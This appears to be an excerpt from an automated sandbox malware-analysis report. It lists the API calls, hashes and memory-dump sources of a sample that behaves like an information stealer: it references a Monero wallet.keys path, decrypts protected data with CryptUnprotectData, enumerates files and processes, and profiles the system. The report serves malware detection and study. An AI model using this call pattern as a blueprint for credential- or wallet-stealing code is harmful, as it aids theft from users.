                                        • Opcode ID: dd4844e7255edc67f33177a350fc9081edd563250bc65d218b1d2f5fdc3cf0e7
                                        • Instruction ID: 398e2ec9b04ff176e42dcae4853fbadaf5df8f76693e2106687c63a0fc4e1e00
                                        • Opcode Fuzzy Hash: dd4844e7255edc67f33177a350fc9081edd563250bc65d218b1d2f5fdc3cf0e7
                                        • Instruction Fuzzy Hash: CB414171941228ABDB24DB94EC99BEDB778FF84700F2041D9E10972295DB342F85CFA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: +iws$7@A$<ko$K]w$f}_$lrz=$m_[_
                                        • API String ID: 0-1257152523
                                        • Opcode ID: c672a07944aca87d874389283414eedfd6583bca3fc1d01f8b312babf67345b4
                                        • Instruction ID: 8f56d8bc6e2318a8933e81c85d2bac0192f789fdf3afd34148e7096c77a75210
                                        • Opcode Fuzzy Hash: c672a07944aca87d874389283414eedfd6583bca3fc1d01f8b312babf67345b4
                                        • Instruction Fuzzy Hash: 0F62F6F3A08200AFE704AE2DDC8567ABBE6EFD4720F1A493DE6C4C7744E53598158693
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00930D73), ref: 0091E4A2
                                        • StrCmpCA.SHLWAPI(?,009314F8), ref: 0091E4F2
                                        • StrCmpCA.SHLWAPI(?,009314FC), ref: 0091E508
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091EBDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: 6712bcd45cbf57bf96de893f6cb25ca555eca226c9313955ae2f2885d374cfc3
                                        • Instruction ID: 734a2fe75a4d1c3eef98c18b9514a3cf1157f3f98e083bad8a16c702e8dd3441
                                        • Opcode Fuzzy Hash: 6712bcd45cbf57bf96de893f6cb25ca555eca226c9313955ae2f2885d374cfc3
                                        • Instruction Fuzzy Hash: EC1221739111289BDB18FB60EC96BED7379AFD4300F4045A8F50A66095EE306F89CF96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 4.4_$Xe_g$d(qz$h`s$%<$%<
                                        • API String ID: 0-3551009197
                                        • Opcode ID: f8288d59cb15555dd0a54fd3dfaf7042c9a88984b4facd2b563091ad25038203
                                        • Instruction ID: 3a0b0b510db5d99f43be62a25f9c396791c40c7679f472aba41fac1077b661a5
                                        • Opcode Fuzzy Hash: f8288d59cb15555dd0a54fd3dfaf7042c9a88984b4facd2b563091ad25038203
                                        • Instruction Fuzzy Hash: 06A216F3A0C6009FE3046F2DEC8567AFBE5EB94720F1A493DEAC583744EA3558148697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $eo{$>I{$O|# $^^<{$p8d-
                                        • API String ID: 0-3499946249
                                        • Opcode ID: 4a79b1550fa5176904912c824d15bbead1068b8b48fef09e53e070b96adb8002
                                        • Instruction ID: b42372d07d84eee03b40e81fe18cb41e1c64fa2386e7b8137d3398e958a36afd
                                        • Opcode Fuzzy Hash: 4a79b1550fa5176904912c824d15bbead1068b8b48fef09e53e070b96adb8002
                                        • Instruction Fuzzy Hash: 00B2F6F3A08204AFE3046E2DEC8567AF7E9EFD4720F1A893DE6C4C3744E63558458696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /:]M$1!CW$Dunb$E><$QO_
                                        • API String ID: 0-2932961135
                                        • Opcode ID: 3156d0774e1ea32d8f798192c35b2855123ebbafa1ddb36a0eb75ea52f0adcbb
                                        • Instruction ID: c39a7886cdf8863727b555e930d9b12dbb3a1e0a79cf476f5fb3175d59c7ea59
                                        • Opcode Fuzzy Hash: 3156d0774e1ea32d8f798192c35b2855123ebbafa1ddb36a0eb75ea52f0adcbb
                                        • Instruction Fuzzy Hash: 53B2E4F360C2009FE7046F29EC8567AFBE9EF94720F1A492DEAC4D3740E67598418697
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0091C871
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0091C87C
                                        • lstrcat.KERNEL32(?,00930B46), ref: 0091C943
                                        • lstrcat.KERNEL32(?,00930B47), ref: 0091C957
                                        • lstrcat.KERNEL32(?,00930B4E), ref: 0091C978
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 1d83dfedbfe268e73c0676cc13932d563ff756c59b181c9f87bb7fc7d15c5d0f
                                        • Instruction ID: ce0c2a9139b248050152118aee5ee5d791d9d81736495958356c13074748f3b9
                                        • Opcode Fuzzy Hash: 1d83dfedbfe268e73c0676cc13932d563ff756c59b181c9f87bb7fc7d15c5d0f
                                        • Instruction Fuzzy Hash: 08415EB590431EDFDB10DF90DD89BEEB7B8AB88305F1046A8E509A7280DB745A84CF91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0091724D
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00917254
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00917281
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009172A4
                                        • LocalFree.KERNEL32(?), ref: 009172AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: a6d86ff7ac61dc19d05a4b04a167a484cfb034d701dea96c7181bd86e9d784af
                                        • Instruction ID: c43a6492e15a3e80da8b8ca15701730d179a3ec2890ea7e48b067b63fcb44b2a
                                        • Opcode Fuzzy Hash: a6d86ff7ac61dc19d05a4b04a167a484cfb034d701dea96c7181bd86e9d784af
                                        • Instruction Fuzzy Hash: 10010075B40308BBDB10DBD4CD45F9D77B8AB44701F104594FB15BB2C0DA70AA018B65
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0092961E
                                        • Process32First.KERNEL32(00930ACA,00000128), ref: 00929632
                                        • Process32Next.KERNEL32(00930ACA,00000128), ref: 00929647
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0092965C
                                        • CloseHandle.KERNEL32(00930ACA), ref: 0092967A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 61912aa855ab2f452080db22146c88ab8c1f972442d5e261a777cc3ad2b54a95
                                        • Instruction ID: 5a83d954aa12e78b864d5d479f8aa8f2f27aa0fe2de8ffab9d59ecc51205e9e3
                                        • Opcode Fuzzy Hash: 61912aa855ab2f452080db22146c88ab8c1f972442d5e261a777cc3ad2b54a95
                                        • Instruction Fuzzy Hash: 9B010C75A00318ABCB14DFA5DD58BEDBBF8FB48701F1042C8A909A7240DB349B44CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?}z$H{y$4]6$X_w
                                        • API String ID: 0-2590440464
                                        • Opcode ID: b3034f3f63615e8ab247431f24309533378c86aa40e91d2b7b6f649c785cc4fa
                                        • Instruction ID: 7c65876b12780624e58ae62e0ad59edf73cd28a3aeafe2b5eb54f4ce5e4c49e7
                                        • Opcode Fuzzy Hash: b3034f3f63615e8ab247431f24309533378c86aa40e91d2b7b6f649c785cc4fa
                                        • Instruction Fuzzy Hash: 01B2F8F360C6009FE304AE2DEC8567ABBE9EF98320F16493DE6C4C7744E63598458796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 9.!,$F&w$JU_z$i ?z
                                        • API String ID: 0-929253275
                                        • Opcode ID: 5461a4d79aeb11a7a5f060bc9f960e668600a8f3b5669e0e2b3abe43c33f8a56
                                        • Instruction ID: f57a3ef090fbedac8f1cd40b58d5a241edc4adc602e59f9539caa13aba7645d4
                                        • Opcode Fuzzy Hash: 5461a4d79aeb11a7a5f060bc9f960e668600a8f3b5669e0e2b3abe43c33f8a56
                                        • Instruction Fuzzy Hash: 6B9218F3A0C2049FE3086F2DEC8567AB7E9EF94720F1A493DE6C4C7740EA7558418696
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009305B7), ref: 009286CA
                                        • Process32First.KERNEL32(?,00000128), ref: 009286DE
                                        • Process32Next.KERNEL32(?,00000128), ref: 009286F3
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • CloseHandle.KERNEL32(?), ref: 00928761
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: a29ab664b19ee4e924ad400010b24eab97ac309dd334a159d7aeeda2e5aaecd4
                                        • Instruction ID: 3662cea85cc95627562d292a03bed5972a0cf361349533582b7425140ebe3fe9
                                        • Opcode Fuzzy Hash: a29ab664b19ee4e924ad400010b24eab97ac309dd334a159d7aeeda2e5aaecd4
                                        • Instruction Fuzzy Hash: 2A315E72901228ABCB24DB51EC51FEEB77CEB88700F104199E509A21A4DF346A45CFA1
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,00915184,40000001,00000000,00000000,?,00915184), ref: 00928EC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 9b5b055b83eef97ec5c2c1e82d11444f83e1e28347cb7545af061b22d41260d2
                                        • Instruction ID: a411cdbb33008e5cfee63dc8b0b1c76198009216bc8c7b68794b326fd0055efb
                                        • Opcode Fuzzy Hash: 9b5b055b83eef97ec5c2c1e82d11444f83e1e28347cb7545af061b22d41260d2
                                        • Instruction Fuzzy Hash: 92112A74201208FFEB00DF64EC84FAB37A9AF89301F109948F9198B258DB35EC41DBA0
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                                        • LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: a067fb232765fb6f9290ada621344afd2075404e531420f008841e464bcfd0e1
                                        • Instruction ID: 535c3fa4fe0850cc4c1f2e5a69a965aae4bf55ec899c6adbc605576249451ea2
                                        • Opcode Fuzzy Hash: a067fb232765fb6f9290ada621344afd2075404e531420f008841e464bcfd0e1
                                        • Instruction Fuzzy Hash: 4511A4B4240308AFEB11CF64DC95FAA77B9FB89701F208199F9159B390C775A941CB50
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00930E00,00000000,?), ref: 009279B0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009279B7
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00930E00,00000000,?), ref: 009279C4
                                        • wsprintfA.USER32 ref: 009279F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: d7c459220d90010ac58aeee917a9fa2b59dc4382db09291c0e0010fede5038b9
                                        • Instruction ID: bf62f43a8b33909047004289ecbc0b29d25ce35526e74752f5d2cabb5f2ebb10
                                        • Opcode Fuzzy Hash: d7c459220d90010ac58aeee917a9fa2b59dc4382db09291c0e0010fede5038b9
                                        • Instruction Fuzzy Hash: 2B112AB2904218ABCB14DFC9DD45BBEB7F8FB4CB12F10425AF605B2280E6395940CBB1
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006BDE88,00000000,?,00930E10,00000000,?,00000000,00000000), ref: 00927A63
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00927A6A
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006BDE88,00000000,?,00930E10,00000000,?,00000000,00000000,?), ref: 00927A7D
                                        • wsprintfA.USER32 ref: 00927AB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: c0912899a7313860ed7a3651691fea27aa63e73776aec10ebeaa8ddc49710e98
                                        • Instruction ID: e5e9789e9c60891d235cde276638f82a3d24814ee74d464e8623af2d88173c65
                                        • Opcode Fuzzy Hash: c0912899a7313860ed7a3651691fea27aa63e73776aec10ebeaa8ddc49710e98
                                        • Instruction Fuzzy Hash: 051152B1945228EBDB108B54EC59F69B778F744721F1047D5E516A32C0D7745A40CF51
                                        APIs
                                        • CoCreateInstance.COMBASE(0092E118,00000000,00000001,0092E108,00000000), ref: 00923758
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009237B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: ba5c335ce4d7fa73ae2c12c92c256d6696e3a7bc86d8a6f4c168c7a70385fd15
                                        • Instruction ID: d0598a9dbb3e7f1d310abdbb3cee1b6fa1b49463ef78983d0ce42c192c8ceb7a
                                        • Opcode Fuzzy Hash: ba5c335ce4d7fa73ae2c12c92c256d6696e3a7bc86d8a6f4c168c7a70385fd15
                                        • Instruction Fuzzy Hash: 8D410971A00A289FDB24DF58DC94B9BB7B4BB48702F4081D8E608EB2D0E7716E85CF50
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00919B84
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00919BA3
                                        • LocalFree.KERNEL32(?), ref: 00919BD3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: e5958cf1a30831096a56c4834f5afffbed96ca54a6c2539a6f685c1a9c93c90f
                                        • Instruction ID: 11ce3e0611f22e1d11c41a114c3ae6ea4747eb15e2b5fc502ad1b52e6023acf2
                                        • Opcode Fuzzy Hash: e5958cf1a30831096a56c4834f5afffbed96ca54a6c2539a6f685c1a9c93c90f
                                        • Instruction Fuzzy Hash: 4011CCB4A00209DFDB04DF94D985AAE77B9FF88301F104598E915A7350D774AE50CF61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
